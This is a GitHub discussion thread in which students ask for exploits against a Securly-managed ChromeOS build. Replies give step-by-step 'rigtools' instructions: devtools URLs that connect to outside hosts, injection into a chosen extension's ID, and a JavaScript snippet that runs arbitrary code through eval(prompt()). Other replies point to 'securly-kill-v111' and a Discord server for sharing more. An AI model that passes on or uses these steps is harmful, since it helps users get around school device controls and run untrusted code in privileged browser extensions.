### DISCUSSION TITLE
Exploits for Securly Chros Version 128.0.6613.133 (Official Build) (64-bit)

### DISCUSSION THREAD

**Discussion by NOoOBBBy** [3kh0/ext-remover#1165] [Help JOIN TITANIUM NETWORK TO SHARE PLEASE] [answered]
Any exploits that I can do?

**Comment by s0urce-c0de** [comment, marked as answer]
rigtools

**Reply by NOoOBBBy** [reply]
How do I do that?

**Reply by HelloIloveGimkit2** [reply]
this is for nooooobbby cuz ur prob not in the tn discord (copied from [stuartcat](https://github.com/3kh0/ext-remover/discussions/1177) cuz I'm lazy)
First visit: devtools://devtools/bundled/devtools_app.html (Make SURE you visit this first)
Then go to : devtools://devtools/bundled/devtools_app.html?experiments=true&wss=rwpk9g-8080.csb.app
or
devtools://devtools/bundled/devtools_app.html?experiments=true&ws=sincereham222.cc:8080
Click on the network tab you will see a grey box as seen in the screenshot below
![image](https://github.com/user-attachments/assets/61c4098e-9bb6-49b0-819d-66b55fd64613)
Double click it and you should see this
![image](https://github.com/user-attachments/assets/981dbeb1-6be7-4fe1-be6a-269653db1465)

click extension id then enter the extension id that you want to inject to (preferably one that has unsafe eval and management in its permissions)
then go to filesystem:chrome-extension:///temporary/index.html
and bookmark it and boom you have Rigtools.
use this to run javascript on any page IF it has unsafe eval
```js
chrome.browserAction.onClicked.addListener(function(tab) { chrome.tabs.executeScript(null, {code: "eval(prompt('Enter code'))"}); }) 

```

**Reply by NOoOBBBy** [reply]
How do I know if it has unsafe eval?

**Reply by NOoOBBBy** [reply]
also if you have a link to the tn server

**Reply by S-PScripts** [reply]
discord.gg/unblock

**Reply by stuartcat** [reply]
You will know if it has unsafe eval in the extensions manifest you can access the manifest using chrome-extension://extension-id-here/manifest.json just press ctrl+f and search unsafe-eval

**Reply by ghost** [reply]
@HelloIloveGimkit2  I don't see any network thing. help?

**Reply by HelloIloveGimkit2** [reply]
try using the one on the repo
https://github.com/3kh0/ext-remover

**Comment by schoolexploitkid** [comment]
securly-kill-v111 if u have ublock origin
